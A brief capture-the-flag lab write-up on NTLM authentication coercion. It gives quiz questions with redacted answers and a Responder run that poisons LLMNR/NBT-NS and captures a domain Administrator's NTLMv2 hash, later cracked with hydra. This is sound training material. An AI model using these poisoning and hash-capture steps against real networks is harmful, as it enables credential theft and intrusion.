Day 23
Coerced Authentication Relay All the Way
Learning Objectives
The basics of network file shares
Understanding NTLM authentication
How NTLM authentication coercion attacks work
How Responder works for authentication coercion attacks
Forcing authentication coercion using
lnkfiles
This room is again a very straightforward one with all commands and instructions already given. We just need to follow along and run them.
What is the name of the AD authentication protocol that makes use of tickets?
[REDACTED]What is the name of the AD authentication protocol that makes use of the NTLM hash?
[REDACTED]What is the name of the tool that can intercept these authentication challenges?
[REDACTED]What is the password that McGreedy set for the Administrator account?
[REDACTED]
This can be found once the hash is obtained and with the help of hydra we can get the password.
┌──(kali㉿kali)-[~]
└─$ sudo responder -I tun0
[sudo] password for kali:
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
NBT-NS, LLMNR & MDNS Responder 3.1.3.0
To support this project:
Patreon -> https://www.patreon.com/PythonResponder
Paypal -> https://paypal.me/PythonResponder
Author: Laurent Gaffie (laurent.gaffie@gmail.com)
To kill this script hit CTRL-C
[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
.
.
.
[+] Current Session Variables:
Responder Machine Name [WIN-55XORMSS5HF]
Responder Domain Name [3ES2.LOCAL]
Responder DCE-RPC Port [46997]
[+] Listening for events...
[SMB] NTLMv2-SSP Client : 10.10.71.80
[SMB] NTLMv2-SSP Username : ELFHQSERVER\Administrator
[SMB] NTLMv2-SSP Hash : [REDACTED]
[*] Skipping previously captured hash for ELFHQSERVER\Administrator
[*] Skipping previously captured hash for ELFHQSERVER\Administrator 
Last updated
Was this helpful?